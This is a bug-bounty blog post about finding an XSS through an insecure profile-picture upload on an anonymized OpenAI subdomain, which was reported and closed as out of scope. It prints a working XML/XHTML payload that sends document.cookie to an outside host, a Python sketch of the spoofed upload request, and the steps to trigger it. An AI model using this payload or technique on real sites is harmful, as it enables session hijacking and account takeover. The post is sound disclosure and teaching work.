Hunting XSS in OpenAI: An Insecure File Upload Adventure Marked Out of Scope

By Deev/techycodec08, September 06, 2024

Introduction

Back in September 2024, I set out to explore the security of OpenAI’s ecosystem, a platform synonymous with cutting-edge AI innovation.

What I uncovered was a fascinating vulnerability: an insecure file upload leading to Reflected Cross-Site Scripting (XSS) on a subdomain of openai.org (anonymized here as subdomain.openai.org).

I reported it through Bugcrowd on September 6, 2024, only to have it marked as Out of Scope (OOS) and deemed “not applicable” for a reward.

While I can’t disclose specifics due to OpenAI’s policy, I’m thrilled to share the anonymized journey of this discovery—how I found it, why it mattered, and what it taught me about bug hunting.

The Bug at a Glance

The vulnerability I identified was a Reflected XSS (Non-Self) stemming from an insecure file upload feature. In essence, I could upload a malicious XML file disguised as a profile picture, which, when accessed via a crafted URL, executed arbitrary JavaScript in another user’s browser under the subdomain.openai.org domain.

This opened the door to stealing session cookies, including CSRF tokens, and potentially escalating to more severe attacks like account takeover.

While it didn’t earn a bounty or public disclosure, the process was a goldmine of learning. Here’s how it unfolded.

The Setup: A Profile Picture Gone Rogue

The adventure began on subdomain.openai.com, a subdomain that redirected me to a different subdomain named subdomain.openai.org after login. This site, likely used for managing projects, offered a feature: the ability to upload a profile picture in the “My Account” settings.

File uploads are a classic attack vector, so I decided to poke around.

The upload process was straightforward—select an image, submit, and it’s stored on the server. But what caught my eye was the lack of strict validation on the file type and content. Time to break out Burp Suite and see what I could get away with.

The Discovery Process

Step 1: Intercepting the Upload

I started by uploading a legitimate image and intercepting the request with Burp.

The file was sent as a Base64-encoded blob, with a Content-Type of image/*. The server accepted it, returned a success response, and provided a URL to the uploaded file under /media/someDirectory/.

So far, standard behavior.

But what if I swapped the image for something more interesting? I crafted a simple XML file containing an XSS payload:

<html>
	<head></head>
	<body>
		<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(document.location="https://mydomain.com/?c="+document.cookie)</something:script>
	</body>
</html>
        
The payload, alert(document.location="https://mydomain.com/?c="+document.cookie), would pop an alert and then redirect the victim’s browser to my server, appending their cookies as the c query parameter.

I Base64-encoded the XML, changed the Content-Type to text/xml, and sent it through the upload endpoint. To my delight, the server accepted it without complaint, storing it at a predictable path like:

https://subdomain.openai.org/media/someDirectory/128703680/profile/rzv3TsxXnnZhR85nzKxMcZz97hcnCx5HzwVgVWMkFqDG8XH69z.xml
        
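The upload step above can be sketched in Python. This is a minimal reconstruction, not the exact traffic: the field names file and contentType and the JSON shape are assumptions, since the real request was captured and replayed in Burp Suite.

```python
import base64

# The XHTML-namespaced payload from above, stored as "profile picture" bytes.
xml_payload = (
    b'<html><head></head><body>'
    b'<something:script xmlns:something="http://www.w3.org/1999/xhtml">'
    b'alert(document.location="https://mydomain.com/?c="+document.cookie)'
    b'</something:script></body></html>'
)

def build_upload_body(data: bytes, declared_type: str) -> dict:
    """Mimic the site's upload format: a Base64-encoded blob plus a
    client-declared Content-Type that the server trusted blindly."""
    return {
        "file": base64.b64encode(data).decode("ascii"),
        "contentType": declared_type,  # swapped from image/* to text/xml
    }

body = build_upload_body(xml_payload, "text/xml")
# In practice I replayed the captured request in Burp Repeater with a body
# like this; the server stored the file and returned its /media/... URL.
```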
Step 2: Triggering the XSS

Next, I sent a GET request to the uploaded file’s URL. The server returned the raw XML, which the browser parsed and rendered as an XHTML page.

But would the JavaScript execute? To test this, I opened a private browser window, logged in as a second user, and visited the same URL. Sure enough, the alert popped up, and my Python server logged a request with the victim’s cookies.

The CSRF token and Session ID matched the victim’s session cookies, proving the XSS was real and exploitable. I had a working proof-of-concept: a crafted URL that, when visited, executed arbitrary JavaScript in the context of subdomain.openai.org.

The Impact: A Window into Exploitation

This wasn’t just a harmless alert. Reflected XSS of this nature carries serious risks: session hijacking via stolen cookies, CSRF-token theft, and potential escalation to account takeover.

From a business perspective, this could erode trust in OpenAI’s platform, especially if attackers targeted high-profile users. The ability to disguise the malicious URL and trick users into clicking it made it particularly insidious.

Assessing the Severity: My CVSS Score

To quantify the severity, I’d assign this vulnerability a CVSS v3.1 score of 5.7 (Medium): remotely exploitable with a crafted URL, but requiring user interaction, since the victim must visit the link.

Reporting and the OOS Verdict

I submitted the bug to OpenAI via Bugcrowd on September 6, 2024, at 18:29:18 UTC, targeting *.openai.org under the API Testing category. My report included detailed steps, screenshots, and a clear PoC. I suggested a P3 priority based on the VRT for Reflected XSS (Non-Self), given its moderate severity.

Three days later, on September 9, 2024, OpenAI closed the submission as “Not Applicable,” marking it OOS. No reward, no further explanation beyond the standard notice. While disappointing, I suspect it was due to subdomain.openai.org being a third-party service not fully under OpenAI’s bounty scope.

The engagement’s “no disclosure” policy also means I can’t share the raw details publicly, but I can still reflect on the experience.

Lessons Learned

This hunt taught me a few valuable lessons.

For developers, this is a reminder to sanitize uploads rigorously—check file types, strip executable content, and avoid rendering user-controlled files directly. For bug hunters, it’s a nudge to clarify scope upfront, especially with subdomains.

Final Thoughts

Though this XSS didn’t land a bounty or a fix (that I know of), it was a thrilling dive into OpenAI’s ecosystem. Uncovering a path from an innocent profile picture to a cookie-stealing payload felt like cracking a puzzle—one that could’ve had real-world bite in the right hands.

I respect OpenAI’s call on scope and their no-disclosure stance, but I hope this anonymized tale inspires fellow hunters to keep probing the edges of the digital frontier.

HAPPY HUNTING!!!!

Connect with Me